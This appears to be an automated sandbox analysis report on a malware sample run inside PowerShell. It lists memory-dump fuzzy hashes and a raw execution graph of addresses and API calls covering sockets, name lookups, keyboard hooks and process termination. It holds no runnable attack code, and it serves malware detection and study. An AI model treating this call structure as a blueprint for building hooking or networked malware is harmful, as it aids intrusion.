• Opcode Fuzzy Hash: 7a90050626d06475fb4824d1ba384dab0f1d0925182465f45bd68f0ea50cd1c2
• Instruction Fuzzy Hash: 90E14834A11208CBD709EB70D461AAE7773EBC9314F119978E5026B7D5CF79AD82CBA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: caa326d3bb30af68a964e2b174af7efaa0b352eefcdd94f1b06ad4cf896136ab
• Instruction ID: d9d08896ace882bfb987f803b4985af2dc0e1ed44a6e9245d11f2b24300fcdea
• Opcode Fuzzy Hash: caa326d3bb30af68a964e2b174af7efaa0b352eefcdd94f1b06ad4cf896136ab
• Instruction Fuzzy Hash: D2B19578A00144DFD784EBA0D959BBE77B2EF89301F118178E6056F3D6CF39A9458B21
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ab0e2d84a989c54a00abf005d5c6e428b7e7473a18299b1ca9dcb320171011b8
• Instruction ID: 87e09d29e2a9e9880438158cf389ce5497c3e36df18345bc1fec0c28819cbc7c
• Opcode Fuzzy Hash: ab0e2d84a989c54a00abf005d5c6e428b7e7473a18299b1ca9dcb320171011b8
• Instruction Fuzzy Hash: 1FB19578A00144DFD784EBA0D958BBE77B2EF89301F118178E605AF3D6CF39A9458B21
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d7ea9e6b44a802cb6afb0ca06d93d68091151cf4abf625384d9f31bcde5417c2
• Instruction ID: 05d07f93182fe8ddfd5a455dd8b6663efbc71bb466d5098cac6cf11f5d971942
• Opcode Fuzzy Hash: d7ea9e6b44a802cb6afb0ca06d93d68091151cf4abf625384d9f31bcde5417c2
• Instruction Fuzzy Hash: E6A15A74A01208DFCB04DFA4C484AEEBBF2BF49314F1985A9D405AB395DB75DE85CB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 31df325c7e0ef036051033ebc741ed46cec4701cde763c3732ecd99b5fe3b401
• Instruction ID: 02caecd7089f2e45ecf40d4543bc074d9125ca8786c94ecf7bcbcc8d90f13b36
• Opcode Fuzzy Hash: 31df325c7e0ef036051033ebc741ed46cec4701cde763c3732ecd99b5fe3b401
• Instruction Fuzzy Hash: 7F518F30A00704DFDB04ABB4C8587AE77F6EF89309F148669E505AB3A0EF759985CB50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523248729.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_b30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15de107d21afbfb8299fd369e907552ee22cb15ba85770d942396ca03583d0fb
• Instruction ID: c53f9c15aeb6496531c20e08a27ba35f31eb870fb1311cfe2fbd99e9e0c52dcc
• Opcode Fuzzy Hash: 15de107d21afbfb8299fd369e907552ee22cb15ba85770d942396ca03583d0fb
• Instruction Fuzzy Hash: 01517C70E10A198FDB14EFAAC9947AEBBF1FF48304F248569E914BB350D7B49944CB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.523248729.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_b30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 56cda5710e40d6e604048d84e4f503ac03b6795ba823f3bd328f386a1210d5c1
• Instruction ID: f54db7870dfe118e98085b32cecf4150705b277908d694c3349b1f44ac984614
• Opcode Fuzzy Hash: 56cda5710e40d6e604048d84e4f503ac03b6795ba823f3bd328f386a1210d5c1
• Instruction Fuzzy Hash: 6C519B70E157198FDB15EFA9C8A06AEBBF1BF49304F2480AAD914BB341D7749D04CB91
Uniqueness

Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: faae3389c9ca638b5aca9d850b6af23ddbc809b9057bee470b984ad0c93fda51
                                                                      • Instruction ID: 98fdcc3e81fb8a86fbcf85dbcb4506eb6722fd62ee95f01a981dc69f5b84f41a
                                                                      • Opcode Fuzzy Hash: faae3389c9ca638b5aca9d850b6af23ddbc809b9057bee470b984ad0c93fda51
                                                                      • Instruction Fuzzy Hash: 6641E4726146148FCB20EF79C84069EB7A6FF91318F054A2AD611CF390DF76EA458BD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e44292d084be51ed6e0035660348b3489529aae421baed10e7645228994111e
                                                                      • Instruction ID: a188fb9f7d551bff0d2d20033b1217464f49b213ad2aeba671049f242e75a7e0
                                                                      • Opcode Fuzzy Hash: 3e44292d084be51ed6e0035660348b3489529aae421baed10e7645228994111e
                                                                      • Instruction Fuzzy Hash: 96419A35B006458FCB14DF58C08496AB7F3FF89718B168569D86AEB361CB34ED42CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1debfa568a9f648692e0654b5f6e269dc659009e76031063c1c7c967ba3e511a
                                                                      • Instruction ID: 819c3664b6d6d05460d0db45b0db6912d518ea868711cf457c479993bd744f25
                                                                      • Opcode Fuzzy Hash: 1debfa568a9f648692e0654b5f6e269dc659009e76031063c1c7c967ba3e511a
                                                                      • Instruction Fuzzy Hash: 6C410770B082448BEB14EF71C8057EE7BF6AF44318F294569D801EB2C1DF758A46CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12d1cd94ebb5633524811adaaac727c66c97fc53c5a1ae26648b29cad94c94e8
                                                                      • Instruction ID: 4efc038bc0c472b32b0eecf05f09b166308d9a079e3ed016dffef67d38809514
                                                                      • Opcode Fuzzy Hash: 12d1cd94ebb5633524811adaaac727c66c97fc53c5a1ae26648b29cad94c94e8
                                                                      • Instruction Fuzzy Hash: F1414474701601CFC744EF38D458A2977E2FF89319B1586A9E90ACB3A1CF75AD868B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce168b9af3e67af26c9fbcf446cf33d325513e5a95dc808e947f02682a6949b9
                                                                      • Instruction ID: 3290ef4162cfd3e36f20f2a64f3d7cf065ab55b4a515ee6ebed55ee1df3173e3
                                                                      • Opcode Fuzzy Hash: ce168b9af3e67af26c9fbcf446cf33d325513e5a95dc808e947f02682a6949b9
                                                                      • Instruction Fuzzy Hash: 9631F270A042418FDB19EB74C4106EE7BF2AF8A308F198569D045EB390EF799D45CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16b5d7512ea6744258747b5009eb4353d5f4be1d1b2cb47383f57e8989d997cf
                                                                      • Instruction ID: 6abee8f2175932cb8e1e3f353e1b6438079ac6aaa3cba47a43869aca17c93407
                                                                      • Opcode Fuzzy Hash: 16b5d7512ea6744258747b5009eb4353d5f4be1d1b2cb47383f57e8989d997cf
                                                                      • Instruction Fuzzy Hash: 5A3159747016018FC344DF38E45861977F2FF89319B158A69E90ACB3B1DB71E986CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d56f85a5210f41f86ab61917a2e51146e503414c082fa5f6480f1db2e9dc1b1b
                                                                      • Instruction ID: 39887eef9822a950f9deb434b11f6fd2a4f9dbadbeebadb3ef03fc66d2c54da7
                                                                      • Opcode Fuzzy Hash: d56f85a5210f41f86ab61917a2e51146e503414c082fa5f6480f1db2e9dc1b1b
                                                                      • Instruction Fuzzy Hash: 4721D2B0A042849FDB10EB78C855BEE77B1FF84718F500569D502EB290EB759F84CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_70d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 356be99353f9072d0ac04d457d326a65f66c1cb3f19faff6b4bef4a380924781
                                                                      • Instruction ID: f95a351efe3f0ea1248591acaf407bef228c3268065006f25cf512b18c7ead32
                                                                      • Opcode Fuzzy Hash: 356be99353f9072d0ac04d457d326a65f66c1cb3f19faff6b4bef4a380924781
                                                                      • Instruction Fuzzy Hash: 852124B1504280DFCF14CF50D8C0B27BBA1FB88314F24C6B9ED094A686C33AD856CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_70d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e2992b2367b654c0df111459805c3a82a4f1dc73f3fc4bce98f765cf24417c5a
                                                                      • Instruction ID: a19a22dccf2a5e3153a919ad7417c6a5258a249ed312815c2b75c660a698a69e
                                                                      • Opcode Fuzzy Hash: e2992b2367b654c0df111459805c3a82a4f1dc73f3fc4bce98f765cf24417c5a
                                                                      • Instruction Fuzzy Hash: 7C21C5B5504244DFDB24CF24D9C4B26BBA5FB88314F24CAB9D9094B787C37AD846CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 54705569cea2fea839059647f145b7259f8666283548ad6e56df4e0d4f1faf53
                                                                      • Instruction ID: 218d14a8a4ff9344500d1cc799c326c1ce01fae6f0b9c79cb886f727b8f4dbe0
                                                                      • Opcode Fuzzy Hash: 54705569cea2fea839059647f145b7259f8666283548ad6e56df4e0d4f1faf53
                                                                      • Instruction Fuzzy Hash: 7E213D302047448FC354EB36C454A6B77E2FF81308F16896DD19ACB261EF76AE41CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9531180b82ecf94cf27a9895a02c45b44f8691f0c42037ddc53e09836e2770b0
                                                                      • Instruction ID: 7c367f036c5a8f7ddce58a673b3a0e322965b9beea0b505b68ed39bd6dc98852
                                                                      • Opcode Fuzzy Hash: 9531180b82ecf94cf27a9895a02c45b44f8691f0c42037ddc53e09836e2770b0
                                                                      • Instruction Fuzzy Hash: 59210B302046048FC754EB36C454AAB73E6FF85308F56896CD19A8B260EF35AD81CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 329987825fd65eab796ffef1062086d33ac024cb63d894a0adf1b3ac7fe29488
                                                                      • Instruction ID: 34719c097821dcf9e230b3008d989b54fd66c1e5ed42232569300fb26a74e1e1
                                                                      • Opcode Fuzzy Hash: 329987825fd65eab796ffef1062086d33ac024cb63d894a0adf1b3ac7fe29488
                                                                      • Instruction Fuzzy Hash: F411E13260D3848FC7269B25DC547AABFE09F82305F0985BFD894CB192D6388A19D762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_70d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b13040e2974110599f9aaf459f51fdf3b27c68673fce204dffde1a99c494d18
                                                                      • Instruction ID: a531b8ad28a21825846e6108d66489fbed646b4a30006854d6b197edc54dc6b2
                                                                      • Opcode Fuzzy Hash: 2b13040e2974110599f9aaf459f51fdf3b27c68673fce204dffde1a99c494d18
                                                                      • Instruction Fuzzy Hash: A521AE75504280DFCB15CF50D5C4B16BFA2FB48314F24C6A9ED494A696C33AD82ACB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 58731ce44cab0c27e42c2bc16b6b45838c53be6248ad61203fbc4b4a1fc2d085
                                                                      • Instruction ID: e98a51d53a7a18e4591ae43e0299f020a18fe68238f87f830994bb751ba81b38
                                                                      • Opcode Fuzzy Hash: 58731ce44cab0c27e42c2bc16b6b45838c53be6248ad61203fbc4b4a1fc2d085
                                                                      • Instruction Fuzzy Hash: 6A11C63130464157D714EB3AD4945EF72DAAFD235CB098A3DE92ACB680EF60AE4547C4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a2c918db8b0dcd3a8ced5d37d71868ee832ce4004a72f4e9901f9743496e2b0c
                                                                      • Instruction ID: 428f374bc23e6887e22a1c4ab67d8ede4eccbc59796db220661ad6f95a624816
                                                                      • Opcode Fuzzy Hash: a2c918db8b0dcd3a8ced5d37d71868ee832ce4004a72f4e9901f9743496e2b0c
                                                                      • Instruction Fuzzy Hash: 3911D822B182575BFB7C7A76D4043BA2AC18F8174DF1848BFC456CB6D1DA5DCD808399
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cab951e55b5c2f551c3d09c023abdaf645aac9d4aa7d6c26dc422e522faed5ce
                                                                      • Instruction ID: 6322b4dea63a70c7726787180c543535dbe709778820c657367b16ad7c54a684
                                                                      • Opcode Fuzzy Hash: cab951e55b5c2f551c3d09c023abdaf645aac9d4aa7d6c26dc422e522faed5ce
                                                                      • Instruction Fuzzy Hash: 0B1112B5D052198FCB14DFAAD884BDEFBF8FB89314F14816AD808BB204D7749944CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_c80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6f5c818909a0f4b4af79a0371c8895aa5a57223986430292a1d8b26e9bb55c6
                                                                      • Instruction ID: 1096d8561b899f598e0f96c54a12a3f033521beea5a85e1bef361b70c0f367e3
                                                                      • Opcode Fuzzy Hash: e6f5c818909a0f4b4af79a0371c8895aa5a57223986430292a1d8b26e9bb55c6
                                                                      • Instruction Fuzzy Hash: 722130B4C052598FCB14CFAAD884BDEFBF4BB88314F14816AD808BB200C3749944CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_70d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec7624ac04d83d1b1af5878c263662589a703ee498abf29b069cff616764cafa
                                                                      • Instruction ID: 19a076f59962d349cf3e1c23af33f2107520197e33406521287ab7ba916464f7
                                                                      • Opcode Fuzzy Hash: ec7624ac04d83d1b1af5878c263662589a703ee498abf29b069cff616764cafa
                                                                      • Instruction Fuzzy Hash: 6A11BB75504280CFDB21CF20D5C4B15BBA1FB84314F28C6AAD8494B697C33AD84ACB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      Execution Graph

                                                                      Execution Coverage:3.1%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:5.2%
                                                                      Total number of Nodes:1220
                                                                      Total number of Limit Nodes:44
45060->45061 45061->44379 45062->45060 45063->44396 45065 40209f 26 API calls 45064->45065 45066 407968 45065->45066 45067 403260 28 API calls 45066->45067 45068 407985 45067->45068 45068->44439 45070 4124d1 45069->45070 45071 4124db getaddrinfo WSASetLastError 45069->45071 45194 41235f 35 API calls ___std_exception_copy 45070->45194 45071->44439 45073 4124d6 45073->45071 45075 40209f 26 API calls 45074->45075 45076 41926e FormatMessageA 45075->45076 45077 41929a 45076->45077 45078 41928c 45076->45078 45081 4192a5 LocalFree 45077->45081 45079 402053 28 API calls 45078->45079 45080 419298 45079->45080 45083 401f98 26 API calls 45080->45083 45082 402015 26 API calls 45081->45082 45082->45080 45084 4192c1 45083->45084 45084->44439 45086 404810 45085->45086 45087 40481d socket 45085->45087 45195 404875 WSAStartup 45086->45195 45089 404837 CreateEventW 45087->45089 45090 404819 45087->45090 45089->44439 45090->44439 45091 404815 45091->45087 45091->45090 45093 404fbd 45092->45093 45094 404f3c 45092->45094 45093->44439 45095 404f45 45094->45095 45096 404f97 CreateEventA 45094->45096 45097 404f54 GetLocalTime 45094->45097 45095->45096 45096->45093 45196 4182d1 28 API calls 45097->45196 45099 404f68 45100 4052d4 28 API calls 45099->45100 45101 404f78 45100->45101 45102 402053 28 API calls 45101->45102 45103 404f87 45102->45103 45104 417d02 79 API calls 45103->45104 45105 404f8c 45104->45105 45106 401f98 26 API calls 45105->45106 45106->45096 45108 4049f2 45107->45108 45109 4048c5 45107->45109 45110 404955 45108->45110 45111 4049f8 WSAGetLastError 45108->45111 45109->45110 45112 4048fa 45109->45112 45115 4052f5 28 API calls 45109->45115 45110->44439 45111->45110 45113 404a08 45111->45113 45197 41d7d4 27 API calls 45112->45197 45116 404909 45113->45116 45117 404a0d 45113->45117 45119 4048e6 45115->45119 45122 402053 28 API calls 45116->45122 45120 41925a 30 API calls 45117->45120 45118 404902 45118->45116 45121 404918 45118->45121 45123 402053 28 API calls 45119->45123 45124 
404a17 45120->45124 45132 404927 45121->45132 45133 40495e 45121->45133 45125 404a57 45122->45125 45126 4048f5 45123->45126 45127 4052d4 28 API calls 45124->45127 45128 402053 28 API calls 45125->45128 45129 417d02 79 API calls 45126->45129 45130 404a27 45127->45130 45134 404a66 45128->45134 45129->45112 45131 402053 28 API calls 45130->45131 45135 404a36 45131->45135 45137 402053 28 API calls 45132->45137 45199 41e5fe 56 API calls 45133->45199 45138 417d02 79 API calls 45134->45138 45139 417d02 79 API calls 45135->45139 45141 404936 45137->45141 45138->45110 45142 404a3b 45139->45142 45140 404966 45143 40499b 45140->45143 45144 40496b 45140->45144 45145 402053 28 API calls 45141->45145 45146 401f98 26 API calls 45142->45146 45201 41d97a 28 API calls 45143->45201 45147 402053 28 API calls 45144->45147 45148 404945 45145->45148 45146->45110 45150 40497a 45147->45150 45151 417d02 79 API calls 45148->45151 45153 402053 28 API calls 45150->45153 45154 40494a 45151->45154 45152 4049a3 45155 4049d0 CreateEventW CreateEventW 45152->45155 45156 402053 28 API calls 45152->45156 45157 404989 45153->45157 45198 41b0ad DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45154->45198 45155->45110 45158 4049b9 45156->45158 45159 417d02 79 API calls 45157->45159 45161 402053 28 API calls 45158->45161 45162 40498e 45159->45162 45163 4049c8 45161->45163 45200 41dc26 54 API calls 45162->45200 45165 417d02 79 API calls 45163->45165 45166 4049cd 45165->45166 45166->45155 45168 404e17 SetEvent FindCloseChangeNotification 45167->45168 45169 404e2e closesocket 45167->45169 45170 404eaf 45168->45170 45171 404e3b 45169->45171 45170->44439 45172 404e51 45171->45172 45202 4050bb 83 API calls 45171->45202 45174 404e63 WaitForSingleObject 45172->45174 45175 404ea5 SetEvent CloseHandle 45172->45175 45203 41b0ad DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45174->45203 45175->45170 45177 404e72 SetEvent WaitForSingleObject 45204 41b0ad DeleteCriticalSection 
EnterCriticalSection LeaveCriticalSection 45177->45204 45179 404e8a SetEvent CloseHandle CloseHandle 45179->45175 45180->44439 45181->44439 45182->44439 45183->44439 45184->44439 45185->44441 45186->44441 45187->44441 45188->44441 45189->44441 45190->44441 45191->44441 45192->44441 45193->44441 45194->45073 45195->45091 45196->45099 45197->45118 45198->45110 45199->45140 45200->45154 45201->45152 45202->45172 45203->45177 45204->45179 45205->44484 45206->44510 45207->44509 45208->44499 45209->44504 45210->44511 45211->44539 45216 40d289 45214->45216 45215 410ac0 3 API calls 45215->45216 45216->45215 45218 40d32f 45216->45218 45220 40d31f Sleep 45216->45220 45224 40d2bb 45216->45224 45217 40773a 28 API calls 45217->45224 45219 40773a 28 API calls 45218->45219 45222 40d33c 45219->45222 45220->45216 45244 418385 28 API calls 45222->45244 45224->45217 45224->45220 45229 401ec9 26 API calls 45224->45229 45232 402053 28 API calls 45224->45232 45236 410ce2 29 API calls 45224->45236 45241 40aed1 111 API calls ___scrt_fastfail 45224->45241 45242 418385 28 API calls 45224->45242 45243 410d87 29 API calls 45224->45243 45227 40d348 45245 410d87 29 API calls 45227->45245 45229->45224 45230 40d35b 45231 401ec9 26 API calls 45230->45231 45233 40d367 45231->45233 45232->45224 45234 402053 28 API calls 45233->45234 45235 40d378 45234->45235 45237 410ce2 29 API calls 45235->45237 45236->45224 45238 40d38b 45237->45238 45246 41030a TerminateProcess WaitForSingleObject 45238->45246 45240 40d393 ExitProcess 45242->45224 45243->45224 45244->45227 45245->45230 45246->45240 45247 438798 45250 4387a4 _swprintf ___FrameUnwindToState 45247->45250 45248 4387b2 45265 439941 20 API calls std::_Deallocate 45248->45265 45250->45248 45253 4387dc 45250->45253 45251 4387b7 45266 43862c 26 API calls std::_Deallocate 45251->45266 45260 441948 EnterCriticalSection 45253->45260 45255 4387e7 45261 438888 45255->45261 45258 4387c2 ___FrameUnwindToState 45260->45255 45263 438896 45261->45263 45262 4387f2 
45267 43880f LeaveCriticalSection std::_Lockit::~_Lockit 45262->45267 45263->45262 45268 4457ac 39 API calls 2 library calls 45263->45268 45265->45251 45266->45258 45267->45258 45268->45263 45269 408a5e 45272 408b21 45269->45272 45271 408a6f 45273 408b81 CallNextHookEx 45272->45273 45274 408b3e 45272->45274 45273->45271 45275 408b49 45274->45275 45276 408b6a 45274->45276 45277 408b5c 45275->45277 45278 408b4e 45275->45278 45285 4098af 45276->45285 45343 409d2e 30 API calls 45277->45343 45278->45273 45342 409cd4 36 API calls 45278->45342 45282 408b5a 45282->45273 45289 4098be 45285->45289 45286 402053 28 API calls 45287 409b4b 45286->45287 45344 408d3b 29 API calls 45287->45344 45289->45286 45290 408b76 45289->45290 45290->45273 45291 409b7b 45290->45291 45292 409b95 45291->45292 45293 409cbe 45291->45293 45294 409c19 45292->45294 45295 409b9b 45292->45295 45345 408b9a 45293->45345 45298 402053 28 API calls 45294->45298 45301 402053 28 API calls 45295->45301 45336 409cbc 45295->45336 45300 409c27 45298->45300 45302 402053 28 API calls 45300->45302 45303 409bc3 45301->45303 45304 409c35 45302->45304 45350 438e7f 46 API calls 45303->45350 45354 418385 28 API calls 45304->45354 45307 409bd1 45309 402053 28 API calls 45307->45309 45308 409c45 45355 409d9c 31 API calls 45308->45355 45311 409be1 45309->45311 45351 40799e 28 API calls 45311->45351 45312 409c58 45356 418385 28 API calls 45312->45356 45315 409c66 45357 402f65 28 API calls 45315->45357 45316 409bec 45352 402e61 28 API calls 45316->45352 45319 409c71 45358 402f65 28 API calls 45319->45358 45320 409bf6 45353 408d3b 29 API calls 45320->45353 45323 409bfe 45325 401f98 26 API calls 45323->45325 45324 409c7b 45359 408d60 27 API calls 45324->45359 45327 409c07 45325->45327 45329 401f98 26 API calls 45327->45329 45328 409c83 45330 401ec9 26 API calls 45328->45330 45331 409c10 45329->45331 45332 409c8c 45330->45332 45334 401f98 26 API calls 45331->45334 45333 401ec9 26 API calls 45332->45333 45335 409c95 45333->45335 
